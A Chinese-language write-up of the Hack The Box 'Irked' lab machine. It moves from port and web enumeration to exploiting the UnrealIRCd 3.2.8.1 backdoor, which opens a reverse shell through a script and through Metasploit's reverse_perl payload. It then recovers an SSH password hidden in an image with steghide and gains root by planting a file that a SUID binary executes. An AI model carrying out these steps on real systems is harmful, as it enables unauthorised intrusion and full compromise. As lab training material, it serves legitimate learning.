HTB Irked writeup(IRC后门有图片,图片信息可提权,SUID劫持权限高)
·
HTB TartarSauce writeup
大佬请忽略!
Irked攻击要点:
★ UnrealIRCd 3.2.8.1 - Backdoor Command Execution
★ home目录中信息泄露
★ suid + 三方软件
信息收集
nmap
└─$ nmap -p- -sCV --min-rate 1000 10.10.10.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 17:12 CST
Nmap scan report for 10.10.10.117
Host is up (0.27s latency).
Not shown: 65018 closed tcp ports (reset), 510 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39200/tcp6 status
| 100024 1 43182/tcp status
| 100024 1 48805/udp6 status
|_ 100024 1 51447/udp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
43182/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 284.34 seconds
└─$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 111,6697,8067,43182,65534 --min-rate 1000 10.10.10.117
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 17:41 CST
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39200/tcp6 status
| 100024 1 43182/tcp status
| 100024 1 48805/udp6 status
|_ 100024 1 51447/udp status
6697/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.14] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
8067/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.14] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
43182/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
| irc-botnet-channels:
|_ ERROR: Closing Link: [10.10.16.14] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
由nmap扫描可知靶机开放ssh服务22端口,http服务80端口,rpcbind服务111、43182端口,irc服务6697、8067和65534端口。域名信息irked.htb。维护域名irked.htb到/etc/hosts,获取一个邮件地址djmardov@irked.htb。
echo 10.10.10.117 irked.htb | sudo tee -a /etc/hosts
HTTP
http://irked.htb/
使用IP和域名获取相同的服务。
gobuster目录文件爆破
└─$ gobuster dir -u http://irked.htb/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://irked.htb/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 72]
/.html (Status: 403) [Size: 289]
/manual (Status: 301) [Size: 307] [--> http://irked.htb/manual/]
/.html (Status: 403) [Size: 289]
/server-status (Status: 403) [Size: 297]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
默认页面没有可利用信息。
ffuf子域名枚举
└─$ ffuf -u http://irked.htb/ -H "Host: FUZZ.irked.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -fw 5
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://irked.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.irked.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 5
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 499 req/sec :: Duration: [0:04:17] :: Errors: 0 ::
没有获取子域名信息。
IRC信息收集
安装hexchat
sudo apt install hexchat -y
启动
hexchat
没有发现可用的频道,发现版本号Unreal3.2.8.1。
Shell as ircd
Without metasploit
└─$ python exploit.py 10.10.10.117 6697 -payload python
Exploit sent successfully!
└─$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.10.117] 59867
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$
升级全交互式shell
ircd@irked:~/Unreal3.2$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
ircd@irked:~/Unreal3.2$ ^Z
zsh: suspended nc -lvnp 9000
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 9000
export TERM=xterm
ircd@irked:~/Unreal3.2$ stty rows 29 columns 119
ircd@irked:~/Unreal3.2$
With metasploit
└─$ msfconsole
Metasploit tip: Writing a custom module? After editing your module, why not try
the reload command
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.4.61-dev ]
+ -- --=[ 2515 exploits - 1292 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search exploit/unix/irc/unreal_ircd_3281_backdoor
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 > use 0
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
ng-metasploit.html
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/adduser . normal No Add user with useradd
1 payload/cmd/unix/bind_perl . normal No Unix Command Shell, Bind TCP (via Perl)
2 payload/cmd/unix/bind_perl_ipv6 . normal No Unix Command Shell, Bind TCP (via perl) IPv6
3 payload/cmd/unix/bind_ruby . normal No Unix Command Shell, Bind TCP (via Ruby)
4 payload/cmd/unix/bind_ruby_ipv6 . normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
5 payload/cmd/unix/generic . normal No Unix Command, Generic Command Execution
6 payload/cmd/unix/reverse . normal No Unix Command Shell, Double Reverse TCP (telnet)
7 payload/cmd/unix/reverse_bash_telnet_ssl . normal No Unix Command Shell, Reverse TCP SSL (telnet)
8 payload/cmd/unix/reverse_perl . normal No Unix Command Shell, Reverse TCP (via Perl)
9 payload/cmd/unix/reverse_perl_ssl . normal No Unix Command Shell, Reverse TCP SSL (via perl)
10 payload/cmd/unix/reverse_ruby . normal No Unix Command Shell, Reverse TCP (via Ruby)
11 payload/cmd/unix/reverse_ruby_ssl . normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
12 payload/cmd/unix/reverse_ssl_double_telnet . normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
ng-metasploit.html
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
RHOSTS => 10.10.10.117
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
RPORT => 6697
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.10.16.14
LHOST => 10.10.16.14
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.117 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usi
ng-metasploit.html
RPORT 6697 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.16.14 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.10.16.14:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Command shell session 1 opened (10.10.16.14:4444 -> 10.10.10.117:52963) at 2025-11-07 15:40:34 +0800
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
Shell as djmardov
查看靶机用户
ircd@irked:/home/djmardov$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh
收集到的信息
ircd@irked:/home/djmardov/Documents$ cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
下载图片
└─$ wget http://10.10.10.117/irked.jpg
--2025-11-07 15:57:22-- http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’
irked.jpg 100% 33.88K 57.7KB/s in 0.6s
2025-11-07 15:57:23 (57.7 KB/s) - ‘irked.jpg’ saved [34697/34697]
获取密码
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
└─$ cat pass.txt
Kab6h+m+bbp2J:HG
ssh djmardov@10.10.10.117
└─$ ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ id
uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:~$
Shell as root
suid
文件设置 SUID 位后,执行时以文件所有者的权限运行,而非调用者的权限,常用于允许普通用户访问需要高权限的程序。
djmardov@irked:~$ find / -perm -4000 -type f 2>/dev/null -exec ls -la {} \;
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
/usr/bin/viewuser
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-11-07 02:02 (:0)
djmardov pts/2 2025-11-07 02:36 (10.10.16.14)
sh: 1: /tmp/listusers: not found
djmardov@irked:~$ ls -la /tmp/listusers
ls: cannot access /tmp/listusers: No such file or directory
/tmp/listusers文件找不到,创建/tmp/listusers赋予执行权限,传入id。
djmardov@irked:~$ echo id > /tmp/listusers
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-11-07 02:02 (:0)
djmardov pts/2 2025-11-07 02:36 (10.10.16.14)
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root
传入bash
djmardov@irked:~$ echo bash > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2025-11-07 02:02 (:0)
djmardov pts/2 2025-11-07 02:36 (10.10.16.14)
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。
更多推荐
5
0- 0
已为社区贡献10条内容
所有评论(0)